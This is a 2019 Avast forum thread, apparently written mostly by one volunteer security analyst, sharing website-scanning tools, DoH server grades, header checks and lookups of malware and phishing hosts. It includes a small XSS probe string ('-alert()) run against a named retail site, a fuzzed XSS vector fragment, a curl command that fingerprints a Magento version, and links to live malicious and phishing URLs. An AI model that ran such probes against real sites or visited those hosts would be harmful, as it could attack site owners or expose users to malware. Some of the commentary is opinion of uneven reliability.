Source: https://support.mozilla.org/en-US/kb/firefox-dns-over-https

Whenever you are used to non-existing Interwebz-privacy this is not a big thing, remember only that it only furthers the monopoly status of the big players, like we have Google, CloudFlare,

So again less to choose from, or use: Intra — an Android application by Jigsaw to route your DNS queries to a DNS-over-HTTPS server of your choice, re: https://play.google.com/store/apps/details?id=app.intra

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on September 09, 2019, 12:41:44 PM
Several Public DOH servers tested against Mozilla Observatory Scan.

1. https://observatory.mozilla.org/analyze/dns.adguard.com   F-grade status
2. https://observatory.mozilla.org/analyze/dns.google   B- grade status
3. https://observatory.mozilla.org/analyze/cloudflare-dns.com  C- grade status
4. https://observatory.mozilla.org/analyze/dns9.quad9.net  no 200 OK returned, F-grade status
5. https://observatory.mozilla.org/analyze/doh.cleanbrowsing.org  B-grade status
6. https://observatory.mozilla.org/analyze/doh.crypto.sx  D- grade status
7. https://doh-ch.blahdns.com/dns-query  no 200 OK returned, F-grade status
8. https://observatory.mozilla.org/analyze/dns.rubyfish.cn  D+ grade status
9. https://observatory.mozilla.org/analyze/doh.dnswarden.com  no 200 OK returned D+ grade status
10.. EU server: https://observatory.mozilla.org/analyze/dns.aaflalo.me  D+ grade status
11.  https://observatory.mozilla.org/analyze/doh.captnemo.in  D- grade status
12. https://observatory.mozilla.org/analyze/rdns.faelix.net  no 200 OK returned, D- status
13. https://observatory.mozilla.org/analyze/doh.armadillodns.net  F-grade status
14. https://observatory.mozilla.org/analyze/doh.netweaver.uk   no 200 OK returned  C- grade status
15: https://observatory.mozilla.org/analyze/jp.tiar.app  has an A+ status 

Found at: https://github.com/curl/curl/wiki/DNS-over-HTTPS

From thiese results it seems that DNSSec Japan, is best, A+ status grade,
No Censorship, No Logging, No ECS, support DNSSEC in Japan,
Nihon iti!  (source credits go to: luntrus)

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on September 09, 2019, 05:08:44 PM
On being fast: https://www.dnsperf.com/#!dns-resolvers
see: https://cloudflare-dns.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 29, 2019, 11:37:55 AM
AMP

Why AMP is bad? Read: https://medium.com/@danbuben/why-amp-is-bad-for-your-site-and-for-the-web-e4d060a4ff31

Convert to AMP: https://www.ezoic.com/google-amp-converter/?{lpurl}?utm_source=google&utm_medium=g&utm_term=accelerated%20mobile%20pages&utm_content=228474895894&utm_campaign=755009171&utm_source=google&utm_medium=g&utm_term=accelerated%20mobile%20pages&utm_content=228474895894&utm_campaign=755009171&gclid=EAIaIQobChMI0Zfv49j15AIVTPlRCh2hQAdaEAAYASAAEgL32fD_BwE

Test AMP: https://search.google.com/test/amp

And see in the light of Google's (non-)existing privacy policies: https://www.theregister.co.uk/2019/09/25/google_privacy_wc3/

What is shown often is not known, end-user transparency does not exist or barely,
end-users aren't fully aware of the tracking and data-slurping that is going on all of the time all the time,
and it almost seems end-users rather not know.

A rather small percentage of "wokers" to these facts of digital life around. It is all about less user-control
on content (fake news), analytics & design, and more advanced Google control.

1. (Most important) Use a VPN or Proxy server.

2. Use an ad blocker.

3. Disable 3rd party cookies.

4. Disable JavaScript or use just what you need to make the webpage function for you (uMatrix)

5. Use a good browser and  not the Google Chrome (clone) spyware)).
    When using Google Chrome use it in incognito mode (and it does not track you that way).  (info credits; Maelstorm)

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on October 05, 2019, 12:22:49 AM
L.S. Found my topic mentioned here: https://forum.avast.com/index.php?topic=129271.msg1513283#msg1513283
This is at 'google results' here: https://www.virustotal.com/gui/ip-address/217.160.0.127/details
This related to this scan result: https://www.virustotal.com/gui/url/6dd7baf5fafb4b7fab4f3f6d9e6f95b862409a697b4e651af8c0fb7adced5ae3/details
where now 7 engines detect.
Also mentioned at the above google results = https://urlquery.net/report/5c0b87e5-08cf-4f80-9b70-89af08ec9e68
coming from this scan report @ urlquery dot net: https://urlquery.net/report/63564530-782e-4486-8c90-6b86f60b1514
malware detected by fortinet's this index.php uri

pol
Title: Re: Tests and other Media topics
Post by: polonus on October 05, 2019, 12:28:38 PM
Chrome browser will eventually block all http-content on https websites, this is announced from version 81 henceon.
No more injections then can take place into http-elements through MIM attacks.

Test here random example: https://observatory.mozilla.org/analyze/meedoeninarnhem.nl

US providers used above mentioned leak to change adverts to their own and add adverts,
it is also a royal way in for fake-news and pop-ups of sorts.

One root is to do this in the browser another route could be to make websites implement CSP,
Content Security Policy: read: https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP

Good to enable "Tracker SSL" as a browser extension to see how trackers help you protect against for instance NSA snooping.

Another way to check is SSL-check: https://www.jitbit.com/sslcheck/
At these forums pages failed to crawl were: Pages failed to crawl (error returned from the server):
-https://forum.avast.com/index.php?action=.xml;type=rss - empty response
-https://forum.avast.com/index.php?action=verificationcode;vid=search;rand=8d73f3bbXXXXXXXXXX024b5f69c13817;sound - empty response

Test any website: https://nibbler.silktide.com/  and here: http://www.siteliner.com/

The avast forum report: https://nibbler.silktide.com/en_US/reports/forum.avast.com

Hey, folks, read here and else on the forums, because we have found, that
"Over the past 3 months, this website has experienced a moderate decrease in popularity."  :o

polonus (volunteer 3rdparty cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: Asyn on October 05, 2019, 12:39:50 PM
The avast forum report: https://nibbler.silktide.com/en_US/reports/forum.avast.com

Hey, folks, read here and else on the forums, because we have found, that
"Over the past 3 months, this website has experienced a moderate decrease in popularity."  :o
That's actually a good sign, as this is a support forum, less traffic means less problems. ;)
Title: Re: Tests and other Media topics
Post by: polonus on October 05, 2019, 02:04:38 PM
Hi Asyn,

That is your view. ;D You always see the glass half full, while others constantly are looking a half an empty glass  ;)

This is not reassuring, how easy it is for authorities to tap fiber-data, the proverbial key under the doormat, see here:
https://www.youtube.com/embed/o_WE6Rg_o5E?autoplay=0&enablejsapi=1&wmode=opaque

A network provider does not have an internal network, think of data-traffic in a back-up procedure between data-centers.  :o
Not a lot of the common public is aware of this siutuation, and the ease with which surveillance can get get at all of our data
or at least the very bulk of it.

polonus
Title: Re: Tests and other Media topics
Post by: Asyn on October 05, 2019, 02:19:08 PM
Unfortunatly, I doubt that users are aware/interested... :-\
Title: Re: Tests and other Media topics
Post by: bob3160 on October 05, 2019, 03:45:44 PM
The avast forum report: https://nibbler.silktide.com/en_US/reports/forum.avast.com (https://nibbler.silktide.com/en_US/reports/forum.avast.com)

Hey, folks, read here and else on the forums, because we have found, that
"Over the past 3 months, this website has experienced a moderate decrease in popularity."  :o
That's actually a good sign, as this is a support forum, less traffic means less problems. ;)
Less traffic could also mean less customers which is not a good thing.
I have noticed a large decrease in traffic on the forum.
Title: Re: Tests and other Media topics
Post by: DavidR on October 05, 2019, 06:08:45 PM
The avast forum report: https://nibbler.silktide.com/en_US/reports/forum.avast.com

Hey, folks, read here and else on the forums, because we have found, that
"Over the past 3 months, this website has experienced a moderate decrease in popularity."  :o
That's actually a good sign, as this is a support forum, less traffic means less problems. ;)

Personally I think this report isn't really designed for the likes (excuse the disgraceful pun) of a support forums and not some commercial enterprise where many of these 'popularity' ratings are pointless.

Quote from: extract
Marketing
How well marketed and popular the website is.
I don't see any relationship to this in a support forum.

Quote from: extract
This website does not appear to be associated with a Twitter account.
So bloody what.

Quote from: extract
Social interest
1.  We did not find any Facebook likes or Google +1s for the 5 pages we tested.
Encourage sharing of your content with social media buttons on articles and pages of your website.
2.  The amount of social activity a website should have depends very much on the type of website, its target audience, and how long it has been in operation.

Boy am I glad there aren't any "Facebook likes or Google +1s"
For me that last quoted sentence confirms my comment about the point of avast forums doesn't really lend itself for this type of analysis.

I don't think that less Popularity actually equates to less traffic.

I would say that some traffic is down (but not all) the viruses and worms sub-forum does seem less active, less people requiring help with infections.  I would say that some traffic is up, those complaining about bugs, ads in the UI, etc.  This isn't a good thing and this isn't something that can be measured in this way.
Title: Re: Tests and other Media topics
Post by: polonus on October 12, 2019, 12:04:50 PM
@DavidR,

Happy, when you are happy, agree with you there  ;)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 12, 2019, 12:18:39 PM
Now brought in by Mozilla, CloudFlare & Google to a browser near you:
DoH = (DNS over HTTPS):

https://observatory.mozilla.org/analyze/doh.cleanbrowsing.org
Mozilla, CloudFlare & Google with DoH versus the rest of the globe,
making it harder for supervision, see the controversy kicked up by UK authorities,
with their usual objection (safety filtering for minors).

I, in my humble opinion, see it as a two-sided sword.

Big Commerce will love it for the obvious reasons, some end-users and/or other organizations may like it far less.

More (in)security through obscurity. Not improved website security,
only better secure connection implementation towards whatever insecure or even criminal sites.
But rogues and criminals will also adopt DoH.  :o

Read: https://www.netsparker.com/blog/web-security/pros-cons-dns-over-https/

Consider: https://observatory.mozilla.org/analyze/doh.cleanbrowsing.org  (B-status).

Conclusion what is good for Big Money IT core business and gigantic properity,
is not that perse for the common end-user (their much ignored product)  8)

Free services normally mean you are owned by something or some-one,
well at least on propriety software that is.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 12, 2019, 06:00:44 PM
Checking on SSL Certificate Abuse: https://sslbl.abuse.ch/ssl-certificates/sha1/e8a9f30e99e3a9f64e32aa375c2b0c2ece06ade7/
See reason for listing: blacklisted because of malware.
On IP: https://www.shodan.io/host/192.99.211.205
On host name: -> -205.211.99.rdns.systems -> https://toolbar.netcraft.com/site_report?url=205.211.99.rdns.systems
VT results on IP -> https://www.virustotal.com/gui/ip-address/192.99.211.205/details
engines to detect -> https://www.virustotal.com/gui/ip-address/192.99.211.205/relations
See: https://mxtoolbox.com/SuperTool.aspx?action=https%3a%2f%2fwindows-wsus-en.com%2f&run=toolpage
& https://observatory.mozilla.org/analyze/windows-wsus-en.com

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 13, 2019, 01:33:33 PM
Various DNS and domain tests:
Test website and connection: https://en.internet.nl/
DNSViz visualization scan: https://dnsviz.net/
DNSSEC validation: https://dnssectest.sidnlabs.nl/
Zonemaster domain check: https://www.zonemaster.net/domain_check

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 14, 2019, 10:41:26 PM
Mozilla now protects Firefox against attacks via about:pages:
Read: https://blog.mozilla.org/security/2019/10/14/hardening-firefox-against-injection-attacks/

Now they have introduced CSP re-written code inside the browser. (CSP means Content Security Policy)
Good action by Mozilla's Browser Development Team.

However, how many websites do not have one single CSP implementation enabled?

For the frightening results on the website infrastructure,
look here on the map immuniweb presents: https://www.immuniweb.com/websec/

The browser may have now come with further improved security,
many, many websites still have a long way to go, where best security policies are being concerned.

Scan websites here:
https://securityheaders.com/?q=&followRedirects=on

For immediate threat risk evaluation results (MiM attacks, sending e-mails fraudulently etc.):
https://webscan.upguard.com/#/

Of course the browser end-user can do something to get better protection,
by (temp) blocking JavaScript etc. via an extension like uMatrix.

Mozilla always had Giorgio Maone's No Script to perform such tasks.

Where JavaScript is concerned, it always is an uneven battle between attacker and those that try to protect against it.
Security protection has to take all sort of issues into account over with a wide protection window,
a malicious hacker just has need for a tiny little worm-hole to get through,
be it in some cases after the hundredth parameter, when he tested that out.  (info source credits go to luntrus)

So for volunteer 3rd party cold recon website security analysts and website error-hunters it is time to stay vigilant.

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on October 21, 2019, 03:55:13 PM
How to go about strengthening the security of your website?
Some issues to consider.

When you perform a scan here: http://isithacked.com/check/
One should establish whether there is no Cloaking taking place,
that means the site does not show other code to Google as it does to Googlebot.

Check status codes, they should all be the same.

Are there no spammy looking links?

Any inframes, that could be hidden and malicious?

Is your site blacklisted - Reputation Check
PASSED
Google Safe Browse:OK
Spamhaus Check:OK
Abuse CC:OK
Dshield Blocklist:OK
Cisco Talos Blacklist:O

In the case of a Word Press Security Scan we could get such blacklisting info also, also info on outdated Word Press software,
outdated plug-ins etc. Info on wrong settings like User Enumeration enabled and Directory Listing enabled.

Also we should check webserver excessive info proliferation. Check on IP via shodan.io,
you then also could explore server bugs and vulnerabilities given for that particular host - domain IP.
An example on GoDaddy's with vulnerabilities: https://www.shodan.io/host/107.180.57.26
Note: the device may not be impacted by all of these issues. The vulnerabilities are implied based on the software and version.
That is why making your webserver not talking that loud is so important! (Dazzlepod ip scan - DOM-XSS issue scan).


Please retire vulnerable jQuery libraries. Two ways to check - Retire.JS extension for website developers https://retirejs.github.io/retire.js/
or check here: http://retire.insecurity.today/#!/scan

Another check for JavaScript errors with an extension like Javascript Errors Notifier.
Web Developer extension gives a complete range of tools - then open Ctrl+Shift+I
This for website developers -

Also important to know about security header implementation, check through an extension like RECX Security Analyzer.
Or just scan: https://www.immuniweb.com/websec/  and here: https://observatory.mozilla.org/

Then just generate your CSP: https://www.cspisawesome.com/

It is not good to read for example:
X-Frame-Options header is missing
-2 X-XSS-Protection header is missing
-1 X-Content-Type-Options header is missing

In the next posting we look over other aspects and will go a-linting,

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)


Title: Re: Tests and other Media topics
Post by: polonus on October 21, 2019, 04:28:58 PM
Very nice extended test: https://www.immuniweb.com/websec/?id=PfsziMm1
C+ grade and see the miscofigurations alerted there.

Also important to see the 3rd party content -
compare this top a scan here: https://webcookies.org/cookies/
-> https://webcookies.org/cookies/ww1.samuzar.com/28557040?676320
with resource insecurely loaded over plaintext HTTP.

Sometimes additional scans should be performed: https://webcookies.org/cookies/pxlgnpgecom-a.akamaihd.net/16643915
See: https://www.shodan.io/host/23.62.7.136 -> https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=cHhsZ25wZ3teXW0tfC58a3xtfFtoIy5ue3Q%3D~enc
Quote
PORT    STATE SERVICE VERSION
80/tcp  open  http    AkamaiGHost (Akamai's HTTP Acceleration/Mirror service)
|_http-server-header: AkamaiGHost
|_http-title: Invalid URL
443/tcp open  ssl
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
| tls-nextprotoneg:
|   http/1.1
|_  http/1.0
Dazzlepod info

Also see Netcraft Site Report - risk grade 1 red out of 10:
https://toolbar.netcraft.com/site_report?url=a23-62-7-136.deploy.static.akamaitechnologies.com
Detections for this IP address: https://www.virustotal.com/gui/ip-address/23.62.7.136/relations

Blocked for me by an extension = -dt.gnpge.com  : https://www.virustotal.com/gui/ip-address/23.62.7.136/relations

polonus

Title: Re: Tests and other Media topics
Post by: polonus on October 21, 2019, 10:14:21 PM
Some security linting done here for security issues and recommendations:
https://webhint.io/scanner/d95de77c-34b5-4a24-8a9d-56c2d3247f5a#category-security
https-only -  Site should be served over HTTPS to ensure a better connection.
validation not set: 'set-cookie' header to set 'vsid' doesn't have the 'secure' directive
See why this is important: https://webhint.io/docs/user-guide/hints/hint-validate-set-cookie-header/#why-is-this-important
x-content-type-options: 3 hints - Response should include 'x-content-type-options' header.
SSL-labs - does not support HTTPS-

Site has a critical security risk and is blocked by an extension for me:
https://sitecheck.sucuri.net/results/ww1.samuzar.com - see under links found, see:
https://otx.alienvault.com/indicator/ip/208.91.196.145/  IP, having instant access malware - Trojan.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 26, 2019, 12:09:44 AM
I was reading about these subjects: attack vectors, they are being introduced here: http://www.tecapi.com/public/relative-vulnerability-rating-gui.jsp  and then here: http://www.tecapi.com/public/rvr-view-attack-vector-gui.jsp?antiCsrfToken=null&attackVectorId=10  and see why these attack vectors are critical.

Then I went over an attack vector that was found up by fuzzing and only working in Firefox like
Quote
<!----!> but not in chrome and again on älert(1)" string when I reached here: https://alf.nu/alert1  HTML & JavaScript and you open a real can of worms, not always, but you sure in for some surprise. You are right in the Win A series of JavaScript challenges.

Are you in for testing, well Polonus does it all the time all of the time: https://alf.nu/Chargen
Combine it with this and learn: https://www.duplichecker.com/url-rewriting-tool.php

Enjoy, my good friends, enjoy,

polonus

Title: Re: Tests and other Media topics
Post by: polonus on October 26, 2019, 02:43:26 PM
You often see me react on Word Press flaws on reported websites in the Virus & Worms section.

Here an example.

How to test for such flaws against your own website: http://evuln.com/tools/sql-encoder/
See where others utterly have failed: https://codecurmudgeon.com/wp/sql-injection-hall-of-shame/
And an example of SQL Injection on a plug-in of the Word Press CMS:
https://securityboulevard.com/2019/04/sql-injection-in-duplicate-page-wordpress-plugin/

PHP driven CMS, could often mean a can of worms: use a PHP security scanner: http://evuln.com/tools/php-security/
And whenever you decide to use it anyways, use best practices: https://www.cloudways.com/blog/php-security/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 26, 2019, 06:02:24 PM
Now on unto something completely different.
Mysticism and numbers.
As a teacher I still learned to check difficult multiplications through the proof by nine.

For the link to the stack and the digital world, see:
see number theory:
https://math.stackexchange.com/questions/1620248/the-nine-rule-proof-example-13-15-28-rightarrow-control-13-15

Also Tesla made his specific observations and especially on the trits- 3,6,9:
https://blog.world-mysteries.com/science/why-did-tesla-say-that-369-was-the-key-to-the-universe/

Funny all goes back even to the days of the Big "Goochems" (the Jewish scientists of Mathematics in the days of Alhambra),
but only with Arabic numbers, not with the Latin equivalents. Earlier they counted with a 72-numeric sequence in Babylon,
to make very intricate extrapolations.
Together with a decimal variant for use on the market, counting the fingers of your two hands (menat is 10, as few people  have only four digits). Or taking letters as numbers, aleph = 1, beth = 2 etc.

Now we are entering Quantum days certainly opening further horizons.

polonus aka Damian.

Title: Re: Tests and other Media topics
Post by: DavidR on October 26, 2019, 07:44:09 PM
Well my teacher never taught me that (perhaps I was sleeping) :)
https://en.wikipedia.org/wiki/Casting_out_nines
Title: Re: Tests and other Media topics
Post by: polonus on October 27, 2019, 12:30:53 PM
Hi DavidR,

He probably did not tell you either that Tesla was a very superstitious man, who had a bout of control disorder.
I do not know how common it is for inventors to meddle in such magical issues or artists, think of Michelangelo.

Tesla had it all a bit worse than average,where one just will double check the gas is turned off before leaving the house.
every person have such remainders of the reptile-brain functionality traits.

A teacher would never tell about the proof of nine. They kept it for themselves to quickly check outcomes.

Assume, we arrived to the outcome of 491 × 5915 this number 2.904.365. Through proof by nine we now get 491 mod 9 = 5 via this route: 4+9+1 = 14 → 1+4 = 5, en 5915 mod 9 = 2 via: 5+9+1+5 = 20 → 2+0 = 2, and then we get at accordingly (5 × 2) mod 9 = 1, just by adding the number of this resulting in 10. Easy peasy. All Dutch teachers before the Second World War had this at their disposition. It is not being taught anymore.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 31, 2019, 05:53:09 PM
Query related links for -www.test.com
-> https://urlscan.io/result/e65e0f58-a981-4b3a-93e8-2a510319a305/#iocs
-> https://www.test.com/
-> https://www.abuseipdb.com/whois/69.172.200.235
voted as malicious: https://www.threatcrowd.org/ip.php?ip=69.172.200.235
Bad Host Appearance: https://www.projecthoneypot.org/ip_69.172.201.153
Re: https://urlquery.net/report/ab015b74-1030-4da7-a7ea-65fa03ba1dd1
Avast Alert:
Ostrzeżenie!
Strona, na którą chcesz wejść, została oznaczona jako strona przechwytująca dane (phishing).

WRÓĆ DO BEZPIECZNEGO MIEJSCA

-> https://www.hybrid-analysis.com/sample/9e7283dfcf72ec7611c3be196760a9aeb214643da2599e95ed7cc624f1cd0772?environmentId=100
-> https://www.sslshopper.com/ssl-checker.html#hostname=test.com
Re: https://performance.sucuri.net/domain/test.com
-> https://www.cyberscan.io/domains/test.com

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 02, 2019, 12:09:53 AM
A still very actual article: https://www.zdnet.com/article/an-insecure-mess-how-flawed-javascript-is-turning-web-into-a-hackers-playground/

Test: http://research.insecurelabs.org/jquery/test/
For jquery on websites: https://retire.insecurity.today/
and https://dojotoolkit.org/api/?qs=1.8/dojox/validate/web
Test your code: https://snyk.io/test/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 03, 2019, 01:35:09 PM
How to check your website will live up to EU cookie regulations?
Disclaimer: The results presented might not be 100 % correct. This tool is meant to be used by site owners as a starting point for improvements, not as a rigorous analysis. 
https://www.cookiemetrix.com/  free analysis of just the homepage of the website,
for a full analysis create an account. (info credits go to Choi)

You could also compare it here with a privacy and security test: random example https://webcookies.org/cookies/media.reklamaizer.ru/2468946  (best checker i.m.h.o.)

Various checkers: https://www.cookiechecker.nl/  &   https://sitechecker.pro/cookie-checker/ 
Another Dutch one: https://www.browserchecker.nl/cookiewet

Interesting: http://www.whatarecookies.com/view.asp
Cleanse your cookies with Cookienator -> -https://cookienator.software.informer.com/2.6/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 07, 2019, 06:05:38 PM
Watch that CMS that is nearing end of service time!

200.000 Magento-webshops without any patches next year for Magento version 1 - no more security updates to come.
So with that CMS urgent advice is to change to Magento 2 (but that upgrade is not an easy one, so start now).

Read: https://hostingtribunal.com/blog/magento-statistics/
and https://trends.builtwith.com/websitelist/Magento
and https://w3techs.com/technologies/details/cm-magento/all/all

If you want to avoid Magento webshops that did not perform the upgrade to version 2,
then one could find out the version (only when settings allow).
By putting /magento_version behind the domain address.
Example:
$ curl https://www.horecaxl.com/magento_version
Magento/2.1 (Community)  or scan at shodan.io for instance.

Another method is to scan with the tool available from here: https://whatcms.org/

polonus (volunteer 3rd party cold recon security website analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on November 08, 2019, 10:36:50 PM
Here an example of a website still on Magento 1

Scanner of choice: https://www.magereport.com/scan/?s=https://www.shopdutyfree.com/

39 recommendations found through linting: https://webhint.io/scanner/13bf4595-6f35-4107-bdf3-807df5f7cdff
of which following are security related: https://webhint.io/scanner/13bf4595-6f35-4107-bdf3-807df5f7cdff#category-security

Security check for immediate threats: https://webscan.upguard.com/#/https://www.shopdutyfree.com/  (10 detected)
34 checks passed.

Site issue: https://sitecheck.sucuri.net/results/www.shopdutyfree.com

DOM-XSS flaws: Results from scanning URL: -https://www.shopdutyfree.com
Number of sources found: 28
Number of sinks found: 257

Results from scanning URL:
-https://www.shopdutyfree.com/static/version1572656038/_cache/merged/0e2010fc837637e2d987804478c1f47e.min.js
Number of sources found: 34
Number of sinks found: 14

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on November 11, 2019, 01:03:13 PM
Linting is also a form of testing. So I tried to lint a static CMS Tilda built website, running on Qrator server here:
It resulted in 507 recommendations for the website: https://webhint.io/scanner/8be58bd9-04cb-4f5d-8903-1a4fd36aaf5b

DOM-XSS flaws: Results from scanning URL: -https://tilda.cc/ru/
Number of sources found: 7
Number of sinks found: 564
&
Results from scanning URL: -https://static.tildacdn.com/js/tilda-menusub-1.0.min.js
Number of sources found: 3
Number of sinks found: 7

Results from scanning URL: -https://use.typekit.net/gwk7uku.js  (external link)
Number of sources found: 5
Number of sinks found: 3

Another site built with Tilda: https://urlscan.io/result/f81ba6bd-10f2-426c-b2d7-06497c76bfae/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 11, 2019, 11:51:19 PM
Searching "network_suricata_alert.description on Maltiverse,
then later pinpointing detections via VirusTotal IP-relations detections.

What we searched: https://maltiverse.com/search;query=network_suricata_alert.description:%22ET%20INFO%20Suspicious%20HTML%20Decimal%20Obfuscated%20Title%20-%20Possible%20Phishing%20Landing%20Apr%2019%202017%22;page=1;sort=query_score

Where we searched: https://www.virustotal.com/gui/url/c6e7f4508f12cb5c621d1d6a120b153c17352231f251526a089d8e978ce18eb3/details

And eventually what we did find op IP relations:
https://www.virustotal.com/gui/ip-address/80.78.250.103/relations

This PHISHing was flagged by 13 engines: http://www.nmosina.ru/alibaba/ALIBABA/89b43fb1ee59109c36ecd0929cec07ae

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 13, 2019, 11:59:24 PM
Working over header implementation and quieting other headers to get additional website security layers....

Security header scan: (random example): https://securityheaders.com/?q=http%3A%2F%2Fcraft2cart.com&followRedirects=on
Another one https://observatory.mozilla.org/analyze/craft2cart.com
where header scan is part of.
Then we can have results from the security scan on webhint:
where it is alo important for certain headers not to talk too loud, or rather not talk at all (PHP version for instance).
136 recommendations security wise: https://webhint.io/scanner/fd0e3451-9d4a-4908-b9e6-25a1ed3c0ec8#category-security
Then inside the browser there is Recx Security Analyser extension.
Re
Quote
HTTP/1.1 200 OK
Wed, 13 Nov 2019 22:35:33 GMT
Apache
PHP/5.6.40
Thu, 19 Nov 1981 08:52:00 GMT
no-store, no-cache, must-revalidate, post-check=0, pre-check=0
no-cache
SAMEORIGIN
frontend=59c02d7a31291f121ab733e852b40f0a; expires=Wed, 13-Nov-2019 23:35:33 GMT; Max-Age=3600; path=/; domain=craft2cart dot com; HttpOnly
chunked
text/html; charset=UTF-8

We see the PHP version here: so we can look this up: https://www.cvedetails.com/vulnerability-list/vendor_id-74/product_id-128/version_id-298516/PHP-PHP-5.6.40.html
So then we will ask this question: https://stackoverflow.com/questions/5777792/what-does-it-mean-to-run-php-in-quiet-mode
 which will make it tad more difficult for either l33t attackers/and one-horse-trick script kiddies.

But we also have: https://dazzlepod.com/ip/?ip_address=http%3A%2F%2Fcraft2cart.com  (Netcraft risk score 1 red out of 10).

From Lansing where the site is hosted we can find:
https://www.shodan.io/host/208.79.234.118  together with possible vulnerabilities on that hoster.
Note: the device may not be impacted by all of these issues.
The vulnerabilities are implied based on the software and version.
This, when we combine it with this info here: https://toolbar.netcraft.com/site_report?url=host.purvainfosystems.info

Site was with malware during June this year: https://www.virustotal.com/gui/ip-address/208.79.234.118/relations

And we wil find the malware analysis on the malware researcher's resource site like maltiverse.
for craft2cart.com
created 5 months ago / modified 5 months ago
Bancolombia Personas phishing - Antiphishing.com.ar  av-element detected 

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on November 14, 2019, 06:35:04 PM
To check settings for your website, use https://hstspreload.org/

See: https://www.globaldots.com/blog/8-http-security-headers-best-practices

HTTP headers an extension for your browser to check websites with.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 25, 2019, 12:55:04 AM
SSL checker: https://certlogik.com/ssl-checker/
Also other tools at that site: crt alert and decoder.

Another site with this newer scanner: https://redkestrel.co.uk/products/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 27, 2019, 12:10:52 PM
Read: https://sec-consult.com/en/blog/advisories/weak-encryption-cipher-and-hardcoded-cryptographic-keys-in-fortinet-products/

Want to test hard coded key XOR Cipher and the weakness grade resembling Ceasar or rather Vigenère,
test here: https://www.dcode.fr/xor-cipher    with many a tool to test encryption.

What did junky Pentesters find -
https://niiconsulting.com/checkmate/2018/05/reverse-engineering-for-beginners-xor-encryption-windows-x64/

Network Intelligence -  XOR is still used, mainly for obfuscation.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 02, 2019, 11:43:45 PM
Too much about blacklists and blacklisting, now are you on this whitelist?

Check: https://www.dnswl.org/?page_id=72

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 03, 2019, 11:37:48 AM
Using middleware inside browsers to speed up DNS-prefetching etc.
Read: https://github.com/helmetjs

DNS Prefetching is being used to resolve hosts faster and get a better load, however it could inside Google Chrome lead to averse effects. Making web pages load slower, not load at all, etc.

Read: https://www.mydigitallife.net/turn-off-dns-prefetching-in-google-chrome-to-fix-resolving-host-and-cannot-load-page-error/

DNS-prefetching can be turned off-on inside your browser privacy settings.

Test performance here: https://www.webpagetest.org/

Also see test tools here: https://geekflare.com/test-your-website-load-time/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 05, 2019, 01:04:11 PM
Combing with DOM-XSS scanning for sinks and sources combining wit retirablejQuery library issues,
we have fine resources here: https://github.com/s0md3v/AwesomeXSS

Find them before they find you  ::)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 05, 2019, 04:57:25 PM
What also could bring a lot of insight on a particular website, is when you open it up inside the Developer's Console,
this could be done through at the same time giving in Ctrl+Shift+I
For this website -https://www.grenson.com
we could analyze:
Quote
 
preload.js:64 [Deprecation] Element.createShadowRoot is deprecated and will be removed in M73, around March 2019. Please use Element.attachShadow instead. See https://www.chromestatus.com/features/4507242028072960 for more details.
init @ preload.js:64
content-tss.js:2 content-tss.js loaded:  -https://www.grenson.com/us/'-alert()/
(unknown) hosted page injected
content-ads.js:2 content-ads.js loaded:  -https://www.grenson.com/us/'-alert()/
content.js:21 Uncaught TypeError: Illegal invocation: Function must be called on an object of type StorageArea
    at content.js:21
-www.google-analytics.com/analytics.js:1 Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
-grens11111.pcapredict.com/js/sensor.js:1 Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
(index):1 [DOM] Found 2 elements with non-unique id #email: (More info: -https://goo.gl/9p2vKq) <input type=​"text" name=​"login[username]​" placeholder=​"Email" value id=​"email" class=​"input-text required-entry validate-email" title=​"Email Address">​ <input type=​"text" name=​"login[username]​" placeholder=​"Email" value id=​"email" class=​"input-text required-entry validate-email" title=​"Email Address">​
(index):1 [DOM] Found 2 elements with non-unique id #login-form: (More info: -https://goo.gl/9p2vKq) <form action=​"-https:​/​/​www.grenson.com/​us/​customer/​account/​loginPost/​" method=​"post" id=​"login-form">​…​</form>​ <form action=​"-https:​/​/​www.grenson.com/​us/​customer/​account/​loginPost/​" method=​"post" id=​"login-form">​…​</form>​
(index):1 [DOM] Found 2 elements with non-unique id #pass: (More info: -https://goo.gl/9p2vKq) <input type=​"password" name=​"login[password]​" placeholder=​"Password" class=​"input-text required-entry validate-password" id=​"pass" title=​"Password">​ <input type=​"password" name=​"login[password]​" placeholder=​"Password" class=​"input-text required-entry validate-password" id=​"pass" title=​"Password">​
